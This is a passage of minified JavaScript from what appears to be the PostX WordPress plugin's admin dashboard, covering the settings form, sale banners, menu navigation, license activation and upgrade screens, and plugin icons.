ultp-template-list__content"},(2==t||4==t)&&(0,r.createElement)(p.Z,{type:"custom_size",c_s:{size1:60,unit1:"px",size2:20,unit2:"px",br:2}}),(0,r.createElement)(p.Z,{type:"custom_size",c_s:{size1:42,unit1:"px",size2:20,unit2:"px",br:2}}),(0,r.createElement)(p.Z,{type:"custom_size",c_s:{size1:42,unit1:"px",size2:20,unit2:"px",br:2}}),(0,r.createElement)(p.Z,{type:"custom_size",c_s:{size1:56,unit1:"px",size2:20,unit2:"px",br:2}}),(0,r.createElement)(p.Z,{type:"custom_size",c_s:{size1:25,unit1:"px",size2:12,unit2:"px",br:2}}))))))))))),y&&(0,r.createElement)("div",{className:"ultp-condition-wrapper ultp-condition--active"},(0,r.createElement)("div",{className:"ultp-condition-popup ultp-popup-wrap"},(0,r.createElement)("button",{className:"ultp-save-close",onClick:()=>k("")},i.ZP.close_line),Object.keys(E).length&&u?(0,r.createElement)(c.Z,{type:u,id:"yes"==y?I:y,settings:b,defaults:E,setShowCondition:"yes"==n?k:""}):(0,r.createElement)("div",{className:"ultp-modal-content"},(0,r.createElement)("div",{className:"ultp-condition-wrap"},(0,r.createElement)("div",{className:"ultp_h3 ultp-condition-wrap-heading"},(0,r.createElement)(p.Z,{type:"custom_size",c_s:{size1:330,unit1:"px",size2:22,unit2:"px",br:2}})),(0,r.createElement)(p.Z,{type:"custom_size",c_s:{size1:460,unit1:"px",size2:22,unit2:"px",br:2}}),(0,r.createElement)("div",{className:"ultp-condition-items"},(0,r.createElement)("div",{className:"ultp-condition-wrap__field"},(0,r.createElement)(p.Z,{type:"custom_size",c_s:{size1:100,unit1:"%",size2:30,unit2:"px",br:2}})),(0,r.createElement)("div",{className:"ultp-condition-wrap__field"},(0,r.createElement)(p.Z,{type:"custom_size",c_s:{size1:100,unit1:"%",size2:30,unit2:"px",br:2}})),(0,r.createElement)("div",{className:"ultp-condition-wrap__field"},(0,r.createElement)(p.Z,{type:"custom_size",c_s:{size1:100,unit1:"%",size2:30,unit2:"px",br:2}}))))))),B&&(0,s.cs)({tags:"builder_popup",func:e=>{H(e)},data:{icon:"template_lock.svg",title:__("Create Unlimited Templates With PostX Pro","ultimate-post"),description:__("We are sorry. Unfortunately, the free version of PostX lets you create only one template. Please upgrade to a pro version that unlocks the full capabilities of the dynamic site builder.","ultimate-post")}}))}},3944:(e,t,n)=>{"use strict";n.d(t,{Z:()=>p});var a=n(7294),r=n(1383),o=n(4766),i=n(4482),l=n(8949),s=n(356);n(8350);const{__}=wp.i18n,p=()=>{const[e,t]=(0,a.useState)({}),[n,p]=(0,a.useState)({state:!1,status:""}),[c,d]=(0,a.useState)(!1);(0,a.useEffect)((()=>{m()}),[]);const u=(0,r.t)(),m=()=>{wp.apiFetch({path:"/ultp/v2/get_all_settings",method:"POST",data:{key:"key",value:"value"}}).then((e=>{e.success&&u.current&&t(e.settings)}))};return(0,a.createElement)("div",{className:"ultp-dashboard-general-settings-container"},(0,a.createElement)("div",{className:"ultp-general-settings ultp-dash-item-con"},(0,a.createElement)("div",null,n.state&&(0,a.createElement)(s.Z,{delay:2e3,toastMessages:n,setToastMessages:p}),(0,a.createElement)("div",{className:"ultp_h5 heading"},__("General Settings","ultimate-post")),Object.keys(e).length>0?(0,a.createElement)("form",{onSubmit:e=>{d(!0),e.preventDefault();const t=new FormData(e.target),n={};for(const a of e.target.elements)a.name&&("checkbox"!==a.type||a.checked?"select-multiple"===a.type?n[a.name]=t.getAll(a.name):"custom_multiselect"==a.dataset.customprop?n[a.name]=a.value?a.value.split(","):[]:n[a.name]=a.value:n[a.name]="");wp.apiFetch({path:"/ultp/v2/save_plugin_settings",method:"POST",data:{settings:n,action:"action",type:"type"}}).then((e=>{e.success&&p({status:"success",messages:[e.message],state:!0}),d(!1)}))},action:""},(0,i.DC)(i.u4,e),(0,a.createElement)("div",{className:"ultp-data-message"}),(0,a.createElement)("div",null,(0,a.createElement)("button",{type:"submit",className:"cursor ultp-primary-button "+(c?"onloading":"")},__("Save Settings","ultimate-post"),c&&o.ZP.refresh))):(0,a.createElement)("div",{className:"skeletonOverflow"},Array(6).fill(1).map(((e,t)=>(0,a.createElement)("div",{key:t},(0,a.createElement)(l.Z,{type:"custom_size",classes:"loop",c_s:{size1:150,unit1:"px",size2:20,unit2:"px",br:2}}),(0,a.createElement)(l.Z,{type:"custom_size",classes:"loop",c_s:{size1:"",unit1:"",size2:34,unit2:"px",br:2}}),(0,a.createElement)(l.Z,{type:"custom_size",classes:"loop",c_s:{size1:350,unit1:"px",size2:20,unit2:"px",br:2}})))),(0,a.createElement)(l.Z,{type:"custom_size",c_s:{size1:120,unit1:"px",size2:36,unit2:"px",br:2}})))),(0,a.createElement)("div",{className:"ultp-general-settings-content-right"},(0,a.createElement)(i.gR,{FRBtnTag:"settingsFR",proBtnTags:"postx_dashboard_settings"})))}},3546:(e,t,n)=>{"use strict";n.d(t,{Z:()=>o});var a=n(7294),r=n(2044);n(8009);const{__}=wp.i18n,o=()=>{const[e,t]=(0,a.useState)(ultp_dashboard_pannel.helloBar);if(new Date>=new Date("2025-06-23")&&(new Date,new Date("2025-07-09")),"hide"===e||ultp_dashboard_pannel.active)return null;const n=[{title:__("Final Hour Sales Alert:","ultimate-post"),subtitle:__("Enjoy","ultimate-post"),offer:__("up to 45% OFF","ultimate-post"),product:__("on PostX Pro -","ultimate-post"),link_text:__("Buy Now!","ultimate-post"),utmKey:"final_hour_sale",startDate:new Date("2025-08-04"),endDate:new Date("2025-08-14")},{title:__("Massive Sales Alert:","ultimate-post"),subtitle:__("Enjoy","ultimate-post"),offer:__("up to 50% OFF","ultimate-post"),product:__("on PostX Pro -","ultimate-post"),link_text:__("Buy Now!","ultimate-post"),utmKey:"massive_sale",startDate:new Date("2025-08-18"),endDate:new Date("2025-08-29")},{title:__("Flash Sale is live:","ultimate-post"),subtitle:__("Get","ultimate-post"),offer:__("up to 45% OFF","ultimate-post"),product:__("on PostX Pro -","ultimate-post"),link_text:__("Grab it Now!","ultimate-post"),utmKey:"flash_sale",startDate:new Date("2025-09-01"),endDate:new Date("2025-09-17")},{title:__("Exclusive Deals Live:","ultimate-post"),subtitle:__("Get","ultimate-post"),offer:__("up to 50% OFF","ultimate-post"),product:__("on PostX Pro -","ultimate-post"),link_text:__("Grab it Now!","ultimate-post"),utmKey:"exclusive_deals",startDate:new Date("2025-09-21"),endDate:new Date("2025-09-30")},{title:__("Booming Black Friday Deals:","ultimate-post"),subtitle:__("Enjoy","ultimate-post"),offer:__("up to 60% OFF","ultimate-post"),product:__("on PostX -","ultimate-post"),link_text:__("Get it Now!","ultimate-post"),utmKey:"black_friday_sale",startDate:new Date("2025-11-05"),endDate:new Date("2025-12-10")},{title:__("Fresh New Year Savings:","ultimate-post"),subtitle:__("Enjoy","ultimate-post"),offer:__("up to 55% OFF","ultimate-post"),product:__("on PostX -","ultimate-post"),link_text:__("Get it Now!","ultimate-post"),utmKey:"new_year_sale",startDate:new Date("2026-01-01"),endDate:new Date("2026-02-15")}].find((e=>{const t=new Date;return t>=e.startDate&&t<=e.endDate}));let o=0;if(n){const e=new Date;o=Math.floor((n?.endDate-e)/1e3)}return(0,a.createElement)("div",null,n&&(0,a.createElement)("div",{className:"ultp-setting-hellobar"},(0,a.createElement)("span",{className:"dashicons dashicons-bell ultp-ring"}),n.title," ",n.subtitle," ",(0,a.createElement)("strong",null,n.offer)," ",n.product," ",(0,a.createElement)("a",{href:(0,r.Z)({utmKey:n.utmKey,hash:"pricing"}),target:"_blank",rel:"noreferrer"},n.link_text,"   ➤"),(0,a.createElement)("button",{type:"button",className:"helobarClose",onClick:()=>{return e=o,t("hide"),void wp.apiFetch({path:"/ultp/hello_bar",method:"POST",data:{type:"hello_bar",duration:e}});var e},"aria-label":__("Close notification","ultimate-post"),style:{background:"none",border:"none",padding:0,cursor:"pointer"}},(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",width:"20",height:"20",fill:"none",viewBox:"0 0 20 20"},(0,a.createElement)("path",{stroke:"currentColor",d:"M15 5 5 15M5 5l10 10"})))))}},1383:(e,t,n)=>{"use strict";n.d(t,{t:()=>_});var a=n(7294),r=n(3935),o=n(3100),i=n(4766),l=n(860),s=n(7191),p=n(8351),c=n(3644),d=(n(9780),n(3944)),u=n(3546),m=(n(2156),n(2470)),f=n(3701),h=n(5957),g=n(3554),v=n(58);const{__}=wp.i18n;function _(){const e=(0,a.useRef)(!1);return(0,a.useEffect)((()=>(e.current=!0,()=>e.current=!1)),[]),e}document.body.contains(document.getElementById("ultp-dashboard"))&&r.render((0,a.createElement)(a.StrictMode,null,(0,a.createElement)((()=>{const[e,t]=(0,a.useState)("xx"),[n,r]=(ultp_dashboard_pannel.status,ultp_dashboard_pannel.expire,(0,a.useState)(!1)),_=[{link:"#home",label:__("Dashboard","ultimate-post"),showin:"both"},{link:"#startersites",label:__("Starter Sites","ultimate-post"),showin:"both",tag:"New"},{link:"#builder",label:__("Site Builder","ultimate-post"),showin:ultp_dashboard_pannel.settings.hasOwnProperty("ultp_builder")&&"false"!=ultp_dashboard_pannel.settings.ultp_builder?"both":"none",showhide:!0},{link:"#blocks",label:__("Blocks","ultimate-post"),showin:"both"},{link:"#addons",label:__("Add-ons","ultimate-post"),showin:"both"},{link:"#settings",label:__("Settings","ultimate-post"),showin:"both"}],w=[{label:__("Get Support","ultimate-post"),icon:"dashicons-phone",link:"https://www.wpxpo.com/contact/?utm_source=postx-menu&utm_medium=all_que-support&utm_campaign=postx-dashboard"},{label:__("Welcome Guide","ultimate-post"),icon:"dashicons-megaphone",link:ultp_dashboard_pannel.setup_wizard_link},{label:__("Join Community","ultimate-post"),icon:"dashicons-facebook-alt",link:"https://www.facebook.com/groups/gutenbergpostx"},{label:__("Feature Request","ultimate-post"),icon:"dashicons-email-alt",link:"https://www.wpxpo.com/postx/roadmap/?utm_source=postx-menu&utm_medium=all_que-FR&utm_campaign=postx-dashboard"},{label:__("Youtube Tutorials","ultimate-post"),icon:"dashicons-youtube",link:"https://www.youtube.com/watch?v=_GfXTvSdJTk&list=PLPidnGLSR4qcAwVwIjMo1OVaqXqjUp_s4"},{label:__("Documentation","ultimate-post"),icon:"dashicons-book",link:"https://wpxpo.com/docs/postx/?utm_source=postx-menu&utm_medium=all_que-docs&utm_campaign=postx-dashboard"},{label:__("What’s New","ultimate-post"),icon:"dashicons-edit",link:"https://www.wpxpo.com/category/postx/?utm_source=postx-menu&utm_medium=all_que-roadmap&utm_campaign=postx-dashboard"}],b=e=>{if(e.target&&!e.target.classList?.contains("ultp-reserve-button")&&e.target.href&&e.target.href.indexOf("page=ultp-settings#")>0){const n=e.target.href.split("#");n[1]&&(t(n[1]),window.scrollTo({top:0,behavior:"smooth"}))}e.target.closest(".dash-faq-container")||e.target.classList?.contains("ultp-reserve-button")||r(!1)},[x,y]=(0,a.useState)(window.location.hash||e);(0,a.useEffect)((()=>{const e=()=>{y(window.location.hash||"#welcome")};return window.location.hash||(window.location.hash=_[0].link.replace("#","")),window.addEventListener("hashchange",e),()=>{window.removeEventListener("hashchange",e)}}),[]),(0,a.useEffect)((()=>{const n=x.replace("#","");n&&n!==e&&t(n)}),[x,e]),(0,a.useEffect)((()=>((()=>{let e=window.location.href;e.includes("page=ultp-settings#")&&(e=e.split("page=ultp-settings#"),e[1]&&t(e[1]))})(),document.addEventListener("mousedown",b),()=>document.removeEventListener("mousedown",b))),[]);const[k,E]=(0,a.useState)({success:!1,license:""});return(0,a.createElement)("div",{className:"ultp-menu-items-wrap"},(0,a.createElement)(u.Z,null),(0,a.createElement)("div",{className:"ultp-setting-header"},(0,a.createElement)("div",{className:"ultp-setting-logo"},(0,a.createElement)("img",{className:"ultp-setting-header-img",loading:"lazy",src:ultp_dashboard_pannel.url+"/assets/img/logo-new.png",alt:"PostX"}),(0,a.createElement)("span",{className:"ultp-setting-version"},ultp_dashboard_pannel.version)),(0,a.createElement)("div",{className:"ultp-menu-items",id:"ultp-dashboard-ultp-menu-items"},_.map(((t,n)=>"both"==t.showin||"menu"==t.showin||t.showhide?(0,a.createElement)("a",{href:t.link,style:{display:"none"==t.showin?"none":""},id:"ultp-dasnav-"+t.link.replace("#",""),key:n,className:(t.link=="#"+e?"current":"")+" ultp-menu-item",onClick:()=>y(t.link.replace("#",""))},t.label,t.tag&&(0,a.createElement)("span",{className:"ultp-menu-item-tag"},t.tag)):""))),(0,a.createElement)("div",{className:"ultp-secondary-menu"},(0,a.createElement)("a",{href:"#plugins",className:"ultp-menu-item "+(["plugins","#plugins"].includes(x)?"current":""),onClick:()=>y("plugins")},i.ZP.connect,__("Our Plugins","ultimate-post")),!ultp_dashboard_pannel?.active&&(0,a.createElement)("a",{href:(0,o.Z)("https://www.wpxpo.com/postx/?utm_source=db-postx-topbar&utm_medium=upgrade-pro-sidebar&utm_campaign=postx-dashboard#pricing"),className:"ultp-secondary-button ultp-pro-button"},__("Upgrade Pro","ultimate-post"),i.ZP.unlock)),(0,a.createElement)("div",{className:"ultp-dash-faq-con"},(0,a.createElement)("span",{onClick:()=>r(!n),className:"ultp-dash-faq-icon ultp-reserve-button dashicons dashicons-editor-help"}),n&&(0,a.createElement)("div",{className:"dash-faq-container"},w.map(((e,t)=>(0,a.createElement)("a",{key:t,href:e.link,target:"_blank",rel:"noreferrer"},(0,a.createElement)("span",{className:`dashicons ${e.icon}`}),e.label)))))),(0,a.createElement)("div",{className:"ultp-settings-container "+("startersites"==e?"ultp-settings-container-startersites":"")},(0,a.createElement)("ul",{className:"ultp-settings-content"},(0,a.createElement)("li",{className:"current"},"xx"!=e&&("home"==e||!["builder","startersites","integrations","saved-templates","custom-font","addons","blocks","settings","tutorials","license","support","plugins"].includes(e))&&(0,a.createElement)(c.Z,null),"saved-templates"==e&&(0,a.createElement)(h.Z,{type:"ultp_templates"}),"custom-font"==e&&(0,a.createElement)(h.Z,{type:"ultp_custom_font"}),"builder"==e&&(0,a.createElement)(p.Z,null),"startersites"==e&&(0,a.createElement)(g.Z,null),"addons"==e&&(0,a.createElement)(l.Z,{integrations:!0}),"blocks"==e&&(0,a.createElement)(s.Z,null),"settings"==e&&(0,a.createElement)(d.Z,null),"license"==e&&(0,a.createElement)(m.C,{licenseData:k,setLicenseData:E}),"support"==e&&(0,a.createElement)(v.Z,null),"plugins"==e&&(0,a.createElement)(f.I,null))),(0,a.createElement)(v.Z,null)),!ultp_dashboard_pannel.active&&(()=>{const e=(new Date).setHours(0,0,0,0)/1e3,t=345600,n=new Date("2024-05-21").setHours(0,0,0,0)/1e3,a=new Date("2024-07-22").setHours(0,0,0,0)/1e3;if(e<n||e>a)return!1;if(ultp_dashboard_pannel.settings.activated_date&&Number(ultp_dashboard_pannel.settings.activated_date)+t>=e)return!1;const r=Number(localStorage.getItem("ultpCouponDiscount"));return r?r<=e&&e<=r+t||e>=r+691200&&(localStorage.setItem("ultpCouponDiscount",String(e)),!0):(localStorage.setItem("ultpCouponDiscount",String(e)),!0)})()&&(0,a.createElement)("a",{className:"ultp-discount-wrap",href:"https://www.wpxpo.com/postx/?utm_source=db-postx-discount&utm_medium=coupon&utm_campaign=postx-dashboard&pux_link=postxdbcoupon#pricing",target:"_blank",rel:"noreferrer"},(0,a.createElement)("span",{className:"ultp-discount-text"},__("Get Discount","ultimate-post"))))}),null)),document.getElementById("ultp-dashboard"))},2470:(e,t,n)=>{"use strict";n.d(t,{C:()=>o});var a=n(7294),r=n(356);n(977);const{__}=wp.i18n,o=({licenseData:e,setLicenseData:t})=>{const[n,r]=(0,a.useState)(""),[o,l]=(0,a.useState)(!1),[s,p]=(0,a.useState)(!0);return(0,a.useEffect)((()=>{(async()=>{p(!0);const e=await(async()=>{try{const e=`${ultp_dashboard_pannel.ajax}`,t=new URLSearchParams({action:"edd_ultp_get_license_data"}),n=await fetch(e,{method:"POST",body:t,headers:{"Content-Type":"application/x-www-form-urlencoded"}});if(!n.ok)throw l(!0),new Error(`HTTP error! Status: ${n.status}`);const a=await n.json();if(a.success)return a.data}catch(e){return null}})();e?.license_data&&t(e?.license_data),p(!1)})()}),[]),(0,a.useEffect)((()=>{"valid"===e?.license?ultp_dashboard_pannel.active=!0:""!=e.license&&"valid"!=e?.license&&(ultp_dashboard_pannel.active=!1)}),[e]),(0,a.createElement)("div",{className:"ultp-license"},s?(0,a.createElement)("div",{className:"ultp-license__activation",style:{display:"flex",flexDirection:"column",gap:"16px",paddingTop:"50px !important"}},(0,a.createElement)(c,{width:"250px",height:"30px"}),(0,a.createElement)(c,{width:"100%",height:"30px",style:{marginTop:"10px"}}),(0,a.createElement)(c,{width:"100%",height:"30px"}),(0,a.createElement)(c,{width:"100%",height:"30px"}),(0,a.createElement)(c,{width:"100%",height:"30px"})):(0,a.createElement)(i,{proUpdate:o,licenseKey:n,setLicenseKey:r,licenseData:e,setLicenseData:t}),(0,a.createElement)(u,null))},i=({proUpdate:e,licenseKey:t,setLicenseKey:n,licenseData:o,setLicenseData:i})=>{const[p,c]=(0,a.useState)(!1),[d,u]=(0,a.useState)(!1),[m,f]=(0,a.useState)({state:!1,status:"",messages:[]}),h=async()=>{try{c(!0);const e=await g(t);e?.status&&(i(e?.license_data),window.location.reload()),f({status:e.status?"success":"error",messages:[e?.data||"Some issues occured"],state:!0}),n(""),c(!1),u(!1)}catch(e){u(!0),f({status:"error",messages:["Some issues occured"],state:!0}),console.error("License Activation Error: ",e)}},g=async e=>{const t=`${ultp_dashboard_pannel.ajax}`,n=new URLSearchParams({action:"edd_ultp_activate_license",security:ultp_dashboard_pannel.nonce,license_key:e}),a=await fetch(t,{method:"POST",body:n,headers:{"Content-Type":"application/x-www-form-urlencoded"}});if(!a.ok)throw new Error(`HTTP error! Status: ${a.status}`);return await a.json()};return(0,a.createElement)("div",{className:"ultp-license__activation"},(0,a.createElement)("div",{className:"ultp-license__title"},__(e?"Notice: Upgrade PostX Pro plugin":"Ready to Use PostX Pro ?","ultimate-post")),m.state&&(0,a.createElement)(r.Z,{delay:2e3,toastMessages:m,setToastMessages:f}),!e&&(0,a.createElement)(a.Fragment,null,"valid"!==o?.license?(0,a.createElement)("div",{className:"ultp-license__form"},(0,a.createElement)("input",{type:"password",id:"ultp-license-key",placeholder:__("Enter Your License Key Here…","ultimate-post"),value:t||"",onChange:e=>n(e.target.value)}),(0,a.createElement)("div",{className:"ultp-license__helper-text"},__("If you’re unable to activate your product license, please contact the","ultimate-post")," ",(0,a.createElement)("a",{href:"https://www.wpxpo.com/contact/",target:"_blank",className:"ultp-license__link",rel:"noreferrer"},__("support team","ultimate-post"))),(0,a.createElement)("div",{className:"ultp-activate-btn ultp_license_action_btn",onClick:()=>h(),role:"button",tabIndex:-1,onKeyDown:e=>{"Enter"===e.key&&h()}},(0,a.createElement)("div",null,__("Activate License","ultimate-post")),p&&(0,a.createElement)("span",{className:"ultp-activate-loading"})),d&&(0,a.createElement)("div",{className:"ultp-license__helper-text"},__("Please make sure your free and pro plugins are updated to the latest release or version. Otherwise, contact the","ultimate-post"),(0,a.createElement)("a",{href:"https://www.wpxpo.com/contact/",target:"_blank",className:"ultp-license__link",rel:"noreferrer"},__("support team","ultimate-post")))):(0,a.createElement)(a.Fragment,null,(0,a.createElement)(l,{title:__("Congratulations on unlocking PostX Pro!","ultimate-post"),message:__("Ignite your imagination and design your ideal experience. Let PostX take care of you and your users.","ultimate-post")}),(0,a.createElement)(s,{licenseData:o,setLicenseData:i,setToastMessages:f}))))},l=({title:e,message:t})=>(0,a.createElement)("div",{className:"ultp-license-message"},(0,a.createElement)("div",{className:"ultp-license-message__icon"},(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",width:"48px",height:"46px",viewBox:"0 0 48 48"},(0,a.createElement)("g",{fill:"currentColor"},(0,a.createElement)("path",{d:"M46.15 26.76a.94.94 0 0 0-.39-1.27 14.7 14.7 0 0 0-16.21 1.62l-1.52-1.52 2.48-2.47a.94.94 0 0 0-1.33-1.33l-2.47 2.48-6.04-6.04a13.1 13.1 0 0 0 1.07-13.98.94.94 0 0 0-1.66.88c2.02 3.8 1.7 8.3-.75 11.76l-3.98-3.98a2.3 2.3 0 0 0-3.79.84L.14 44.9c-.3.86-.1 1.78.54 2.42a2.28 2.28 0 0 0 2.42.54l31.15-11.42a2.3 2.3 0 0 0 .84-3.8l-4.2-4.2a12.83 12.83 0 0 1 13.99-1.3.94.94 0 0 0 1.27-.38ZM14.93 41.52l-8.45-8.45 2.34-6.4 12.5 12.5-6.39 2.35Zm-4.58 1.68L4.8 37.65 5.77 35l7.22 7.22-2.64.97Zm-7.9 2.9A.4.4 0 0 1 2 46a.4.4 0 0 1-.1-.45l2.19-5.96 4.32 4.32-5.96 2.19Zm31.43-11.73a.41.41 0 0 1-.27.3l-5.77 2.12-5.33-5.33a.94.94 0 0 0-1.33 1.32l4.72 4.72-2.64.97L9.53 24.74l.97-2.64 4.72 4.72a.93.93 0 0 0 1.32 0 .94.94 0 0 0 0-1.33l-5.33-5.33 2.11-5.77c.07-.19.23-.25.31-.27h.1c.09 0 .2.02.3.12l19.73 19.73c.14.15.13.31.12.4ZM28.27 7.48c.52 0 .94-.42.94-.94 0-.78.64-1.42 1.43-1.42a3.3 3.3 0 0 0 3.3-3.3.94.94 0 0 0-1.88 0c0 .79-.64 1.43-1.42 1.43a3.3 3.3 0 0 0-3.3 3.3c0 .51.42.93.93.93ZM36.6 16.33c1.87 0 3.4-1.53 3.4-3.4 0-.85.69-1.54 1.53-1.54a.94.94 0 0 0 0-1.87 3.41 3.41 0 0 0-3.4 3.4c0 .85-.7 1.54-1.54 1.54a.94.94 0 0 0 0 1.87ZM42 18.14a3 3 0 1 0 6 0 3 3 0 0 0-6 0ZM45 17a1.13 1.13 0 1 1 0 2.26A1.13 1.13 0 0 1 45 17Z"}),(0,a.createElement)("path",{d:"M29.54 15.92a3 3 0 1 0 0-6 3 3 0 0 0 0 6Zm0-4.12a1.13 1.13 0 1 1 0 2.25 1.13 1.13 0 0 1 0-2.25ZM12 6a3 3 0 1 0 0-6 3 3 0 0 0 0 6Zm0-4.13a1.13 1.13 0 1 1 0 2.26 1.13 1.13 0 0 1 0-2.25ZM42.42 32.91a.94.94 0 0 0-1.32 1.33l.88.88a.93.93 0 0 0 1.33 0 .94.94 0 0 0 0-1.32l-.89-.89ZM46.84 37.33a.94.94 0 0 0-1.32 1.33l.88.88a.93.93 0 0 0 1.33 0 .94.94 0 0 0 0-1.33l-.89-.88ZM46.4 32.91l-.88.89a.94.94 0 0 0 1.32 1.32l.89-.88a.94.94 0 0 0-1.33-1.33ZM41.98 37.33l-.88.88a.94.94 0 0 0 1.32 1.33l.89-.88a.94.94 0 0 0-1.33-1.33ZM46.18 2.76c.24 0 .48-.1.66-.28l.89-.88A.94.94 0 1 0 46.4.27l-.88.89a.94.94 0 0 0 .66 1.6ZM41.76 7.18c.24 0 .48-.1.66-.28l.89-.88a.94.94 0 0 0-1.33-1.33l-.88.89a.94.94 0 0 0 .66 1.6ZM46.84 4.7a.94.94 0 0 0-1.32 1.32l.88.88a.93.93 0 0 0 1.33 0 .94.94 0 0 0 0-1.32l-.89-.89ZM41.98 2.48a.93.93 0 0 0 1.33 0 .94.94 0 0 0 0-1.32l-.89-.89A.94.94 0 0 0 41.1 1.6l.88.88ZM18.86 28.2a.94.94 0 0 0-.93.94.94.94 0 0 0 .93.93.94.94 0 0 0 .94-.93.94.94 0 0 0-.94-.94ZM32.54 18.43l-.68.68a.94.94 0 0 0 1.33 1.33l.68-.68a.94.94 0 0 0-1.33-1.33Z"})))),(0,a.createElement)("div",{className:"ultp-license-message__content"},(0,a.createElement)("div",{className:"ultp-license-message__title ultp-license-message-congrats"},e),(0,a.createElement)("div",{className:"ultp-license-message__text"},t))),s=({licenseData:e,setLicenseData:t,setToastMessages:n})=>{const[r,o]=(0,a.useState)(!1),i=async()=>{try{o(!0);const e=await l();t(e.license_data),n({status:"success",messages:[e?.data||"Some issues occured"],state:!0}),o(!1)}catch(e){n({status:"error",messages:[e.message||"Some issues occured"],state:!0}),o(!1)}},l=async()=>{const e=`${ultp_dashboard_pannel.ajax}`,t=new URLSearchParams({action:"edd_ultp_deactivate_license",security:ultp_dashboard_pannel.nonce,deactivate:"yes"}),n=await fetch(e,{method:"POST",body:t,headers:{"Content-Type":"application/x-www-form-urlencoded"}});if(!n.ok)throw new Error(`HTTP error! Status: ${n.status}`);const a=await n.json();if(a.status)return a};return(0,a.createElement)("div",{className:"ultp-license__status"},(0,a.createElement)("div",{className:"ultp-license__status-messages"},(0,a.createElement)("div",{className:"ultp-license__status-message"},(0,a.createElement)("div",{className:"ultp-license__status-message-label"},__("License Type","ultimate-post")),(0,a.createElement)("div",{className:"ultp-license__status-message-value"},e.licenseType)),(0,a.createElement)("div",{className:"ultp-license__status-message"},(0,a.createElement)("div",{className:"ultp-license__status-message-label"},__("Expire On","ultimate-post")),(0,a.createElement)("div",{className:"ultp-license__status-message-value"},e.expiresAt),(e?.toExpired||"expired"===e.license)&&(0,a.createElement)("a",{href:`https://account.wpxpo.com/checkout/?edd_license_key=${ultp_dashboard_pannel.license}&download_id=${e.itemId}&renew=1`,target:"_blank",rel:"noreferrer",className:"ultp-license__renew-link"},(0,a.createElement)("svg",{width:"20",height:"20",viewBox:"0 0 20 20",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{d:"M2.86 6.553a.5.5 0 01.823-.482l3.02 2.745c.196.178.506.13.64-.098L9.64 4.779a.417.417 0 01.72 0l2.297 3.939a.417.417 0 00.64.098l3.02-2.745a.5.5 0 01.823.482l-1.99 8.63a.833.833 0 01-.813.646H5.663a.833.833 0 01-.812-.646L2.86 6.553z",stroke:"currentColor",strokeWidth:"1.5"})),__("Renew License","ultimate-post"))),(0,a.createElement)(p,{licenseData:e})),(0,a.createElement)("div",{className:"ultp-activate-btn ultp_license_action_btn",onClick:()=>i(),role:"button",tabIndex:-1,onKeyDown:e=>{"Enter"===e.key&&i()}},(0,a.createElement)("div",null,__("Deactivate License","ultimate-post")),r&&(0,a.createElement)("span",{className:"ultp-activate-loading"})))},p=({licenseData:e})=>{const[t,n]=(0,a.useState)(""),r={1:__("5 Sites - Yearly","ultimate-post"),2:__("Unlimited Sites - Yearly","ultimate-post"),3:__("1 Site - Lifetime","ultimate-post"),4:__("5 Sites - Lifetime","ultimate-post"),5:__("Unlimited Sites - Lifetime","ultimate-post")},o={1:[1,2,3,4,5],7:[2,3,4,5],2:[4,5],4:[2,4,5],5:[5]}[e?.priceId];return o&&0!==o.length?(0,a.createElement)("div",{className:"ultp-license__upgrade-message"},(0,a.createElement)("div",{className:"ultp-license__upgrade-message-title"},(0,a.createElement)("label",{htmlFor:"ultp-license-select"},__("Choose a upgrade plan","ultimate-post")),(0,a.createElement)("select",{id:"ultp-license-select",value:t,onChange:e=>{n(e.target.value)}},o.map((e=>(0,a.createElement)("option",{key:e,value:e},r[e]))))),(0,a.createElement)("a",{className:"ultp-license__upgrade-link",href:`https://account.wpxpo.com/checkout/?edd_action=sl_license_upgrade&license_key=${ultp_dashboard_pannel.license}&upgrade_id=${t||o[0]}`,target:"_blank",rel:"noreferrer"},__("Upgrade Now","ultimate-post"))):null},c=({width:e="100%",height:t="1rem",borderRadius:n="4px",style:r={}})=>(0,a.createElement)("div",{className:"ultp-custom-skeleton-loader",style:{width:e,height:t,borderRadius:n,...r}}),d=[{question:__("Do I need the free version of the plugin on my site?","ultimate-post"),answer:__("Yes. You can use the free version of the plugin, which includes the free features of PostX. However, please note that to use the pro features, you need the free version of the plugin installed on your WordPress site.","ultimate-post")},{question:__("Where do I get my product license?","ultimate-post"),answer:__("You can copy the product license from the client dashboard. Once you copy it, paste the license key into the PostX License validation page.","ultimate-post")},{question:__("How do I get help to use PostX Pro?","ultimate-post"),hasMarkup:!0,answer:__("Please go to the support link: <a href='https://www.wpxpo.com/contact/.' target='_blank'>www.wpxpo.com/contact</a>","ultimate-post")}],u=()=>(0,a.createElement)("div",{className:"ultp-license__faq"},d.map(((e,t)=>(0,a.createElement)("div",{key:t,className:"ultp-license-faq__item"},(0,a.createElement)("div",{className:"ultp-license-faq__question"},e.question),e.hasMarkup?(0,a.createElement)("div",{className:"ultp-license-faq__answer",dangerouslySetInnerHTML:{__html:e.answer}}):(0,a.createElement)("div",{className:"ultp-license-faq__answer"},e.answer)))),(0,a.createElement)("div",{className:"ultp-license-faq-item"},__("PostX is a product of WPXPO. The contact support team is ready to help you with any queries, including how to use the pro version of PostX.","ultimate-post")))},3701:(e,t,n)=>{"use strict";n.d(t,{I:()=>l});var a=n(7294),r=n(1383);n(7376);const{__}=wp.i18n,o={wholesale_x:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",width:"40",height:"40",fill:"none",viewBox:"0 0 48 48"},(0,a.createElement)("path",{fill:"#FEAD01",d:"M22.288 5.44498 11.1095 7.77499c-.6634.13829-1.0892.78825-.9509 1.45173l2.33 11.17848c.1383.6635.7883 1.0892 1.4517.9509l11.1785-2.33c.6635-.1383 1.0892-.7882.9509-1.4517l-2.33-11.1785c-.1383-.66347-.7882-1.08921-1.4517-.95092Zm3.1934 15.32522-11.1785 2.33c-.6635.1383-1.0892.7882-.9509 1.4517l2.33 11.1785c.1383.6635.7882 1.0892 1.4517.9509l11.1785-2.33c.6635-.1383 1.0892-.7883.9509-1.4517l-2.33-11.1785c-.1383-.6635-.7883-1.0892-1.4517-.9509ZM37.6161 2.25064 26.4377 4.58065c-.6635.1383-1.0893.78826-.951 1.45173l2.33 11.17852c.1383.6634.7883 1.0892 1.4518.9509l11.1784-2.33c.6635-.1383 